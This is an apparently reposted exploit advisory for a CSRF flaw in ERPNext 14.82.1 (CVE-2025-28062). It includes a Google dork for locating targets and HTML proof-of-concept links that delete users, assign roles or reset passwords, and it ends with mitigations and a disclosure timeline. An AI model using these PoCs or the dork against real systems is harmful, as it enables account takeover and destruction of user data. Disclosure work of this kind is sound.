ERPNext 14.82.1及以下版本存在CSRF漏洞,允许攻击者通过伪造请求执行删除用户、分配角色或重置密码等操作,导致账户接管。修复建议包括启用CSRF保护、限制关键操作为POST方法及标记SameSite cookie。 2025-5-6 20:38:52 Author: cxsecurity.com(查看原文) 阅读量:15 收藏
# Exploit Title: ERPNext 14.82.1 - Account Takeover via Cross-Site Request Forgery (CSRF) # Google Dork: inurl:"/api/method/frappe" # Date: 2025-04-29 # Exploit Author: Ahmed Thaiban (Thvt0ne) # Vendor Homepage: https://erpnext.com # Software Link: https://github.com/frappe/erpnext # Version: <= 14.82.1, 14.74.3 (Tested) # Tested on: Linux (Ubuntu 20.04), Chrome, Firefox. # CVE : CVE-2025-28062 # Category: WebApps # Description: A Cross-Site Request Forgery (CSRF) vulnerability Lead to Account Takeover exists in ERPNext 14.82.1 and 14.74.3. This flaw allows an attacker to perform unauthorized state-changing operations on behalf of a logged-in administrator without their knowledge or consent. Affected endpoints include: - /api/method/frappe.desk.reportview.delete_items - /api/method/frappe.desk.form.save.savedocs Impact: - Deletion of arbitrary users - Unauthorized role assignment - Account takeover via password change The application fails to enforce CSRF tokens on administrative API requests, violating OWASP recommendations. --- # PoC 1: Delete a User <html> <body> <h2>Delete User</h2> <a href="http://target/api/method/frappe.desk.reportview.delete_items?items=%5B%221%401.com%22%5D&doctype=User"> Click Here </a> </body> </html> --- # PoC 2: Assign Role <html> <body> <h2>Assign Role to User</h2> <a href="http://target/api/method/frappe.desk.form.save.savedocs?doc=REDACTED_JSON&action=Save"> Add Role </a> </body> </html> --- # PoC 3: Reset Password <html> <body> <h2>Reset User Password</h2> <a href="http://target/api/method/frappe.desk.form.save.savedocs?doc=REDACTED_JSON&action=Save"> Reset Password </a> </body> </html> --- # Mitigation: - Enforce CSRF protection for all administrative endpoints - Require POST methods for state changes - Mark cookies as SameSite=Strict - Implement re-authentication for critical user changes --- # Disclosure Timeline: - 2025-02-09: Vulnerability discovered - 2025-02-10: Reported to Frappe (no response) - 2025-04-29: Public disclosure via CVE + advisory --- # Author Contact: LinkedIn: https://linkedin.com/in/ahmedth GitHub: https://github.com/Thvt0ne # References: - https://owasp.org/www-community/attacks/csrf
Thanks for you comment!
Your message is in quarantine 48 hours.
如有侵权请联系:admin#unsafe.sh